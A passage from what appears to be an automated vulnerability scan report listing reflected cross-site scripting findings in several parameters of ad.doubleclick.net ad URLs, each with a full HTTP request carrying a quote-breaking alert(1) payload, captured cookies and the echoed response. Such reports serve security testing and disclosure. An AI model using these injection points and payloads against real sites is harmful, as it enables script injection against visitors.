This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246e42f7"-alert(1)-"fff3f79dcc6&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7306

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
leclick.net/click%3Bh%3Dv8/3af6/17/166/%2a/e%3B240097948%3B1-0%3B0%3B61926988%3B4307-300/250%3B41748971/41766758/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246e42f7"-alert(1)-"fff3f79dcc6&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpn
...[SNIP]...

3.191. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2d44"-alert(1)-"a0df08ac7bf was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06d2d44"-alert(1)-"a0df08ac7bf&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7205

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06d2d44"-alert(1)-"a0df08ac7bf&event=58/http://us.blackberry.com/playbook-tablet?CPID=STBANNAUSFY12Q1000000140300000310128004BAN181");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var d
...[SNIP]...

3.192. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [b parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.CBSi/B5448927.5

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f109"-alert(1)-"d9fd11bfd28 was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=54f109"-alert(1)-"d9fd11bfd28&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4608

<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
bleclick.net/click%3Bh%3Dv8/3af6/17/153/%2a/m%3B240360897%3B0-0%3B0%3B63094144%3B3454-728/90%3B41852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=54f109"-alert(1)-"d9fd11bfd28&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAAB
...[SNIP]...

3.193. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.CBSi/B5448927.5

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efa1a"-alert(1)-"e0b3d5aee59 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0efa1a"-alert(1)-"e0b3d5aee59&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4606

<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
/%2a/m%3B240360897%3B0-0%3B0%3B63094144%3B3454-728/90%3B41852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0efa1a"-alert(1)-"e0b3d5aee59&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=
...[SNIP]...

3.194. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [count parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.CBSi/B5448927.5

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb6f7"-alert(1)-"367490e803e was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=cb6f7"-alert(1)-"367490e803e&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4607

<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=cb6f7"-alert(1)-"367490e803e&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/http://www.hp.com/united-states/campaigns/elite-products/index.html?jumpid=ex_R2612_go/elite-products/dm:_N5823.CBSi_63094
...[SNIP]...

3.195. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [cpnmodule parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.CBSi/B5448927.5

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fc88"-alert(1)-"f8894e94b96 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=5fc88"-alert(1)-"f8894e94b96&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4607

<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
og/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=5fc88"-alert(1)-"f8894e94b96&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/http://www.hp.com/united-states/campaigns/elite-products/index.html?jumpid=ex_R2612_go/elite-products/dm:_N5823.CBS
...[SNIP]...

3.196. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [e parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.CBSi/B5448927.5

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcd34"-alert(1)-"06cd0426f9b was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3fcd34"-alert(1)-"06cd0426f9b&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4606

<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
0360897%3B0-0%3B0%3B63094144%3B3454-728/90%3B41852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3fcd34"-alert(1)-"06cd0426f9b&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/http://w
...[SNIP]...

3.197. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [epartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.CBSi/B5448927.5

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7f5a"-alert(1)-"c05029232b4 was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=b7f5a"-alert(1)-"c05029232b4&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4607

<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=b7f5a"-alert(1)-"c05029232b4&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/http://www.hp.com/united-states/campaigns/elite-products/index.html?jumpid=e
...[SNIP]...

3.198. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [event parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.CBSi/B5448927.5

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dea67"-alert(1)-"667d66c1504 was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=dea67"-alert(1)-"667d66c1504 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4601
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 23:22:01 GMT
Expires: Wed, 27 Apr 2011 23:22:01 GMT

<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=dea67"-alert(1)-"667d66c1504http://www.hp.com/united-states/campaigns/elite-products/index.html?jumpid=ex_R2612_go/elite-products/dm:_N5823.CBSi_63094144_240360897_41852066");
var wmode = "opaque";
var bg = "same as SWF";
var dca
...[SNIP]...

3.199. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.CBSi/B5448927.5

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4dbe8"-alert(1)-"7ccee170db7 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn4dbe8"-alert(1)-"7ccee170db7&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4608

<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
